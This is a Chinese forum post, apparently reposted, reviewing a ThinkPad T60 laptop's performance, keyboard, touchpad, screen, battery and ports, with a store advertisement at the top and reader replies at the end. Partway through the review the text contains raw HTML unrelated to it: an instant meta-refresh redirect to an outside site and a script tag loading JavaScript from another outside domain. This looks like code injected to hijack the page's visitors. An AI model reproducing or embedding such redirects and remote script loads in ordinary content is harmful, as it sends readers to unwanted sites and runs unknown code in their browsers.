开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

T60新上手体验[转]

前天拿到了新买的T60,机器的配置是T7200,512M, 120GB/5400RPM,SXGA 1400*1050, 802.11 a/b/g,Bluetooth,DVDRW;立刻换上了2条1G内存,其他没有改动原来配置。
   1,恢复了一次系统;
   2,安装了一些常用的必要软件;
   3,主观测试了一些常规使用。

下面分别谈谈体会。
<meta http-equiv="refresh" content="0; url=http://www.981.cc">
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

感想:
   1,与老版本恢复机制相比,操作上多了许多的提示和确定,比较烦(或许对新手有用)
   2,植入的HPA,容量过大;
      T3,A3的时候是大约600兆文件
      X31达到了大约1400兆;
      T42p我记得好像是达到了2500兆;
      这次的T60,居然高达4500兆。
   3,虽然恢复容量明显加大,数据处理比以往要多,但是得益于整机性能提高,因此恢复时间依然很快。
      A3* ,T3, X3*,T4*恢复一次的时间也差不多是这样。
二:软件安装
  恢复完毕后,自然要看看T60随机携带了啥新的软件。
    和过去一贯类似的有:
         Thinkadvantge, etc.
                PC-Doctor 5 for windows
                Norton改成-Symantec Client Security
       新的改革是:
         集成了一个:Multimedia Center for Think Offerings
                                   含有DLA,Express Labeler, WinDVD,RecordNow
                Google桌面
         Diskeeper
                Picasa2
先保留了这些软件,自己又分别装上了类似
         ACDsee
               Acrobat Pro
               Photoshop
               Office
               和一些常用的即时通讯、媒体浏览和播放软件

整个软件安装过程非常顺利和迅速,得益于强大的新款CPU, 2G 内存和高速硬盘。
三:软件常规使用的主观感受
      1,所有系统自带和后装的软件,启动和运行速度很快(对比T42p/765,2G);没有出现任何停顿、冲突和假死现象;
  2,过多的集成软件(如google桌面),造成不必要的开启(如果用户不喜欢也不需要这类功能的话)
  3,大负荷运行时,系统依然稳定和高效能;
      我仅仅简单同时使用了一下如开启2个即时通讯软件(QQ,MSN),软件播放1080HDTV,OFFICE, ACROBAT ,PHOTOSHOP同时开启,后台做着一个视频转换工作。CPU负荷虽然让他达到了100%,但是程序切换工作时,依然有良好的响应和表现。
最后谈谈一些主观感受:
    因为是全新的机器,从拆开包装时,依然还带有一种久违的亲切感觉;包装还是那样熟悉,里面多了一些纸质说明文件,电源摆放和电话线还是老样子,附带有替换的小红点。
1,外表设计:
     本论坛已经有很多图片和讨论了,不在此赘言;
     仅从上盖关闭情况下,依然还是IBM一贯的特色;打开后,电源开关、音量调节按钮和ThinkVantge钮的改变也算不大,唯一觉得触摸板处的改动,尤其红蓝条的改变,让我一时间无法适应。
2,键盘和触摸板:
     键盘我非常地不喜欢,当时一上手的感觉非常之差(可能和我最近2个月来长期使用A31p的键盘有关系)。为了避免有过多主观因素参杂,我在习惯了T60键盘大约48小时后,特地同时又和A31p,A30p,T30, X31,T42p的键盘做个对比。仅从手感上来说,我个人觉得,完全是背离了IBM笔记本一贯的手感特色;具体表现在触键的行程明显缩短(可能由于架构设计关系,不许过大),回弹过于硬朗,触键声音听起来和过去完全不一样了。虽然我不需要始终看着键盘,关注上面的字符印刷,但是有一点深刻的体会就是,这个T60的键盘,让我很失望。
     01年我最终确定购买IBM的理由中最大的一条就是因为其键盘的手感(当时是从A22m得到的体验),随后从T30,A31p,到现在的T42p基本不变。
     另外让我非常失望的就是这个触摸板了。红蓝条改变的设计我就暂且不去计较,毕竟不会盯着他们看。但是当使用到鼠标的左右键和触摸板的左右键时(虽然我几乎从来不用触摸板,仅仅是为了测试一下),其手感非常之差,和原来的小黑相比,可说不能同日而语了。
3,显示屏
   外观很好,装配也达到要求;检测后没有丝毫斑点和坏点等等。
   亮度完全达到要求,不过说实话,和我用了4年的T30的屏幕(同样都是1400SXGA)亮度几乎一样。
   不过现在还是不太习惯,尤其是在观看视频和图片时,不管从哪个角度固定,都无法全部看到准确色彩还原(相比IPS的UXGA and QXGA)
4,喇叭
   由于架构原因,喇叭的音质和音量,也只能那样了;没有明显的退步或是进步。
5,电池
   标配的6芯电池就已经达到了56.16的设计容量,看来是一个不小的进步啊;
   在外面短期开着无线和蓝牙使用了一下电池,100%降到65% 的时候,坚持了大约50分钟(全速状态下,没有读写光驱),我感觉很好。但是我感觉充电速度比较慢(也可能是心理作用吧)
6,电源
   电源改了接口,不能和原来的型号通用有点遗憾(对于我这样的老用户,尤其感到不方便)所以这次带到办公室,非要带上这个原配的电源(不然办公室里我都常规准备了2个16V4.5的电源)。
 电源外表不错,还有个小切角。做工也不错。
7,各种接口
   机器左侧的耳机接口往用户移动(相比过去),我觉得改动较好;
   左侧的USB,因为竖立,导致有些横向宽大的设备虽然能够插入但是因和桌面抵触而无法使用;
   右侧2个USB不错,供电也很强劲(我用不同设备简单测试了一下)
  光驱接口处外观平整,缝隙在可接受范围。弹出或插入时,手感正常。
8,光驱测试
   用光驱做了些简单的应用(读盘,刻盘),原配光驱就是最新的DVD Multirecoder
型号是GSA-4083N
     a. 读盘顺畅,寻道快速
   b. 刻盘DVD达到最大8速,很稳定,噪音控制也很好(我在后半夜刻盘测试的)
  这个就是目前最快速的DVD笔记本规格的9.5mm刻录机了。
总结一下自己的感受:
  (对比使用T42p: 765,2G,QXGA;A31p: 2.5, 2G ,UXGA; T30: 2.5, 1G , SXGA)

优点:
   1,外出携带非常轻便:
          即便同时携带了电源,装在红点包里背在肩上的感觉还是感到豁然开朗,有点我背X31的感觉了。(常规我是背一个A31p或T42p,有时同时背2个A31p or T42p+X31,昨天同时背了A31p+ A30p)

2,USB端口加到3个(都是高速USB)

3,搭配的刻录机性能强大

4,机器整体性能强大,软件运行快速、稳定。

5,散热良好,风扇未见频繁启动;掌托处未感过热不适。

6,常规4:3, 1400*1050 SXGA 屏幕显示良好,键盘灯白色发光(我不适应改版的黄色灯光一直),亮度也很好。
缺点:
    1,非常不喜欢,也不适应现在的键盘手感
    2,触摸板前方的鼠标左右键和后方的左右键,手感也很差
    3,左侧的USB接口对某些设备插入时感到不方便使用
       可能因为是小黑的老用户关系,现在还一直长期稳定使用着A31p和T42p,对于联想推出的T60/T60p一直没有机会接触。这次接触到T60,虽然不是配置最高的机种,但是依然感受到了最新技术带来的高性能的体验。
    时代在进步,性能上的提高才是最根本的;外观或者是使用舒适性能的某些退步或是妥协,我们作为用户来说,也只能期待厂家的进一步改进了。
    我现在唯一感到遗憾的就是从T60开始启用了全新的电源和扩展接入(T6专用扩展坞),使得自己大量的电源和2631/2877,包括很多过去的U2K ,U slim设备无法使用。

或许从T6开始,我们等到了一个新的ThinkPad时代的到来,在充分的完善和改进后,新系列的机种依然会长时间持续地发挥出小黑的魅力。让我们试目以待吧。
自己顶一个
有帮助,顶一个,
不错
写得好详细喔,顶一下
这个使自己测得,顶一下。别老转别的评测,我们关心的是用户自己的感受
楼主刷分啊 一篇文章被你分成N段 你论坛积分比股票涨的还快!
看了楼主文章,感觉就一个,楼主有米啊....
原帖由 stevenfish 于 2007-4-5 00:37 发表
看了楼主文章,感觉就一个,楼主有米啊....

米是刷出来的~~